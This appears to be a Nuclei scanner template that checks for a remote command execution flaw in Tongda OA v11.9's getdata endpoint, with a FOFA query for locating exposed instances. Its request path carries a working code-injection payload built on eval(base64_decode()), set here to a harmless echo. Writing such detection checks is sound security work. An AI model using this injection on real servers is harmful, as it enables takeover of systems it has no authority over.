30 lines
1.1 KiB
YAML
30 lines
1.1 KiB
YAML
|
id: tongda-getdata-rce
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: Tongda OA v11.9 getadata - Remoce Code Execution
|
||
|
|
author: SleepingBag945
|
||
|
|
severity: critical
|
||
|
|
description: |
|
||
|
|
There is an arbitrary command execution vulnerability in the getdata interface of Tongda OA v11.9. An attacker can execute arbitrary commands on the server to control server permissions through the vulnerability.
|
||
|
|
reference:
|
||
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
||
|
|
metadata:
|
||
|
|
max-request: 1
|
||
|
|
fofa-query: app="TDXK-通达OA"
|
||
|
|
verified: true
|
||
|
|
tags: tongda,rce
|
||
|
|
|
||
|
|
variables:
|
||
|
|
payload: "echo RCE;"
|
||
|
|
|
||
|
|
http:
|
||
|
|
- method: GET
|
||
|
|
path:
|
||
|
|
- "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage"
|
||
|
|
|
||
|
|
matchers:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- 'contains(body, "RCE") && contains(body, "pagelimit")'
|
||
|
|
- 'status_code == 200'
|
||
|
|
condition: and
|